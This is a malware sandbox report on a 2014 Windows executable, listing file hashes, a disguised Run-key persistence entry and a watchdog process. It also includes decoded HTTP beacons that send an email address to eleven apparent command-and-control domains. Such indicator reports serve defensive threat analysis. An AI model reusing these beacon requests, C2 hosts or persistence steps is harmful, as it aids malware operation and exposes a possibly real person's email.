Analysis Date: 2014-09-19 04:35:08

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 4b2cf71a86a23337463373e101641ea6 sha1: 8dd3b229f099c17e4551508dfecc515e3080a6ed size: 296448
Section .rdata: md5: a02a369309816805f3e8cc5505e3de72 sha1: 851ff2bba1ea5c2085d86fae2421efcd8c74f6fe size: 34816
Section (name missing from the export): md5: 8293af0f3f166275bbd88fc282d0d775 sha1: 9def5c983b32f19d413eb1a8d9a878f5e0fd5f29 size: 95232
Timestamp: 2014-07-24 04:47:54
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PC Task Source IKE Media DCOM AutoConnect Error ➝ C:\Documents and Settings\Administrator\Application Data\gnoktrb\xgyebywa.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\gnoktrb\xgyebywa.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\gnoktrb\xgyebywa.exe

↳ C:\Documents and Settings\Administrator\Application Data\gnoktrb\xgyebywa.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\gnoktrb\xgyebywa.bmcxn
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\gnoktrb\apxkqcdhitm.exe
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\gnoktrb\xgyebywa.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\gnoktrb\xgyebywa.exe"

Network Details:
DNS queries: 85 lookups of Type: A (the queried names are missing from the export)
Flows: TCP 192.168.1.1:1031 ➝ (destination missing from the export)
Flows: TCP 192.168.1.1:1032 ➝ (destination missing from the export)
Flows: TCP 192.168.1.1:1033 ➝ (destination missing from the export)
Flows: TCP 192.168.1.1:1034 ➝ (destination missing from the export)
Flows: TCP 192.168.1.1:1035 ➝ (destination missing from the export)
Flows: TCP 192.168.1.1:1036 ➝ (destination missing from the export)
Flows: TCP 192.168.1.1:1037 ➝ (destination missing from the export)
Flows: TCP 192.168.1.1:1038 ➝ (destination missing from the export)
Flows: TCP 192.168.1.1:1039 ➝ (destination missing from the export)
Flows: TCP 192.168.1.1:1040 ➝ (destination missing from the export)
Flows: TCP 192.168.1.1:1041 ➝ (destination missing from the export)

Raw Pcap (decoded from the hex dump; 11 HTTP requests, identical except for the Host header):

GET /index.php?email=jarmall.walker@yahoo.com&method=post HTTP/1.0
Accept: */*
Connection: close
Host: (one of the hosts below)

Hosts contacted, in order:
thinkbeyond.net
presentbeing.net
chiefbeing.net
twelveforever.net
historyforever.net
weatherforever.net
classbeyond.net
thinkflower.net
presentflower.net
collegecorner.net
oftenflower.net

Strings:

An application has made an attempt to load the C runtime library incorrectly.
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
invalid string position
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'